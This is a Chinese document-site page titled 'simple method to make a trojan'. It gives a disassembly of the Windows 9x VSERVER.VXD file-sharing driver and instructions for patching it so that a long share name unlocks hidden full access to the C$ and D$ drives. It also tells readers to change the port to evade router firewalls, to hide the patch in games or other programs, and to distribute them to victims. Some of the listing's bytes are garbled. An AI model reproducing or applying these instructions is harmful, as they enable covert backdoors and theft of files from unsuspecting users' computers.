您的位置:360文档中心› 制作木马的简易方法

制作木马的简易方法

合集下载
相关主题
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

于多少跳转等。

03424 ja short loc_0419 ; 2 byte

03426 POP EAX ;1 byte 堆栈平衡

03427 PUSH EDI ;1 byte

03428 POP EAX ;1 byte EAX=EDI SHARE NAME LONG , 后面要用

刚好字节够用,注意DATA_0182 那儿有重定位那种字节不能简单改动。你可以把你的好的程序好的游戏加上一小段代码这么改动他的VSERVER。VXD文件,最好是硬盘的WINDOWS安装目录打包文件里面的VSERVER。VXD也改动,还有访问共享目录\\IP的139端口也最好加一个别的端口以逃避有些路由器防火墙的设置,再把你的程序散发。。。。。

中了你的木马的你访问他的共享目录后面加一大串字母(共享名串长大于等于

0DH)会提示出错,但你就可以再访问\\IP\C$, \\IP\D$....了,这可是完全共享的了.如果你先没有那个一大串字母的访问他也没有设置远程管理的话

\\IP\C$,\\IP\D$... 都不能访问的,他自己用网络监视器也看不到这种共享的,所以很不容易觉察的。注意你进入共享目录了网络监视器还是能看到。

;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌

; SUBROUTINE

;

; Called from: 031FD, 32CC

;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘

033F4 sub_0026 proc near

033F4 56 push esi

033F5 66| 81 3B 5C5C cmp word ptr [ebx],5C5Ch

033FA 74 07 je short loc_0412 ; Jump if equal

033FC 66| 81 3B 2F2F cmp word ptr [ebx],2F2Fh

03401 75 12 jne short loc_0415 ; Jump if not equal

03403 loc_0412: ; xref 033FA

03403 8D 73 02 lea esi,dword ptr [ebx+2] ; Load effective addr 03406 loc_0413: ; xref 0340F

03406 E8 00006961 call sub_0207 ; (09D6C)

0340B 74 05 jz short loc_0414 ; Jump if zero

0340D 3C 5C cmp al,5Ch ; '\'

0340F 75 F5 jne loc_0413 ; Jump if not equal

03411 46 inc esi

03412 loc_0414: ; xref 0340B

03412 8D 5E FF lea ebx,dword ptr [esi-1] ; Load effective addr 03415 loc_0415: ; xref 03401

03415 2A C0 sub al,al

03417 B9 0000FFFF mov ecx,0FFFFh

0341C 8B FB mov edi,ebx

0341E F2/ AE repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al 03420 8B C7 mov eax,edi

03422 2B C3 sub eax,ebx

03424 83 F8 0D cmp eax,0Dh

03427 77 26 ja short loc_0419 ; Jump if above

03429 55 push ebp

0342A 8B 2D 00011CA4 mov ebp,dword ptr data_0182 ;THE SHARE POINTER ; (11CA4=0)

03430 loc_0416: ; xref 0344C

03430 ?1 FD 00011CA4 cmp ebp,11CA4h

03436 74 16 je short loc_0418 ; Jump if equal

03438 80 7D 08 02 cmp byte ptr [ebp+ClientEBP],2

0343C 75 0B jne short loc_0417 ; Jump if not equal

0343E 8D 75 11 lea esi,dword ptr [ebp+11h] ; Load effective addr 03441 8B FB mov edi,ebx

03443 8B C8 mov ecx,eax

03445 F3/ A6 repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] 03447 74 3A jz short loc_0424 ; Jump if zero

03449 loc_0417: ; xref 0343C

03449 8B 6D 00 mov ebp,dword ptr [ebp+ClientEDI]

0344C EB E2 jmp short loc_0416 ; (03430)

0344E loc_0418: ; xref 03436

0344E 5D pop ebp

0344F loc_0419: ; xref 03427

0344F B8 00060002 mov eax,60002h

03454 5E pop esi

03455 F9 stc ; Set carry flag

03456 C3 retn

03457 loc_0420: ; xref 0349F

03457 8B 43 34 mov eax,dword ptr [ebx+34h]

0345A 8B 1B mov ebx,[ebx]

0345C 81 FB 00011CA4 cmp ebx,11CA4h

03462 74 0A je short loc_0421 ; Jump if equal

03464 3B 43 34 cmp eax,dword ptr [ebx+34h]

03467 74 2F je short loc_0425 ; Jump if equal

03469 B8 00020002 mov eax,20002h

0346E loc_0421: ; xref 03462, 3481, 354D, 35E8

0346E ?E pop esi

0346F F9 stc ; Set carry flag

03470 C3 retn

03471 33 DB db 33h,0DBh

相关文档
最新文档